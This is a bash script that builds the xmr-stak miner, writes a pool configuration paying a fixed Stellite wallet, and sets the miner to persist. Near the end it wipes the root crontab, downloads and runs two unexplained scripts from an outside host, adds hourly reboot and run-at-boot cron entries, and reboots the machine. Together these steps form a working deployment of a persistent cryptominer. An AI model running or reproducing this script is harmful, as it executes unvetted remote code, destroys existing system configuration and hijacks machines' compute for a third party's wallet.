#!/bin/bash

POOLS="\"pool_list\" :\n"
POOLS+="[\n"
POOLS+="{\"pool_address\" : \"stellite.miner.rocks:3333\",\n"
POOLS+="\"wallet_address\" : \"SEiStP7SMy1bvjkWc9dd1t2v1Et5q2DrmaqLqFTQQ9H7JKdZuATcPHUbUL3bRjxzxTDYitHsAPqF8EeCLw3bW8ARe8rYXDQ9kNN6AdLREXVYt\", \"rig_id\" : \"\",\n"
POOLS+="\"pool_password\" : \"x\",\n"
POOLS+="\"use_nicehash\" : true,\n"
POOLS+="\"use_tls\" : false,\n"
POOLS+="\"tls_fingerprint\" : \"\",\n"
POOLS+="\"pool_weight\" : 1 },\n"
POOLS+="],\n"
POOLS+="\"currency\" : \"stellite\",\n"

CONFIG="\"call_timeout\" : 10,\n"
CONFIG+="\"retry_time\" : 30,\n"
CONFIG+="\"giveup_limit\" : 0,\n"
CONFIG+="\"verbose_level\" : 3,\n"
CONFIG+="\"print_motd\" : true,\n"
CONFIG+="\"h_print_time\" : 60,\n"
CONFIG+="\"aes_override\" : null,\n"
CONFIG+="\"use_slow_memory\" : \"warn\",\n"
CONFIG+="\"tls_secure_algo\" : true,\n"
CONFIG+="\"daemon_mode\" : false,\n"
CONFIG+="\"flush_stdout\" : false,\n"
CONFIG+="\"output_file\" : \"\",\n"
CONFIG+="\"httpd_port\" : 16000,\n"
CONFIG+="\"http_login\" : \"\",\n"
CONFIG+="\"http_pass\" : \"\",\n"
CONFIG+="\"prefer_ipv4\" : true,\n"

echo "---UPDATING SYSTEM---"
killall screen && apt-get update --assume-yes && apt install cpulimit

echo "---INSTALL DEPENDENCING---"
sudo apt-get update && sudo apt-get -y install libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev htop

echo "---DOWNLOAD,COMPILE, INSTALL AND CONFIGURE XMR-STAK"
git clone https://github.com/fireice-uk/xmr-stak.git
mkdir xmr-stak/build
cd xmr-stak/build

echo "---compiling xmr-stak-cpu---"
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF ..

echo "---installing xmr-stak-cpu---"
make install
cd /bin


echo "---setting your config---"
touch /root/xmr-stak/build/bin/pools.txt
printf "$POOLS" >> /root/xmr-stak/build/bin/pools.txt
chown root /root/xmr-stak/build/bin/pools.txt

touch /root/xmr-stak/build/bin/config.txt
printf "%b\n" "$CONFIG" >> /root/xmr-stak/build/bin/config.txt
chown root /root/xmr-stak/build/bin/config.txt
cd /root

echo "--MAKE EXECUTABLE CUSTOM FILE---"
sleep 1
wget https://garudamiliter.com/dua.sh
wget https://garudamiliter.com/tiga.sh
chmod a+x dua.sh
chmod a+x tiga.sh

echo "---SET EXECUTABLE RUNNING AT REBOOT---"
crontab -r
crontab -l | { cat; echo "30 * * * * /sbin/reboot" ; } | crontab -
crontab -l | { cat; echo "@reboot /root/tiga.sh" ; } | crontab -
crontab -l
sleep 1
sysctl -w vm.nr_hugepages=128
./tiga.sh
echo "kelar nih bos"

echo "---YOUR MACHINE WILL BE REBOOT IN---"
sleep 1
echo "---YOUR MACHINE WILL BE REBOOT IN 3...---"
sleep 1
echo "---YOUR MACHINE WILL BE REBOOT IN 3...2...---"
sleep 1
echo "---YOUR MACHINE WILL BE REBOOT IN 3...2...1...---"
sleep 1
echo "---REBOOTING---"
reboot
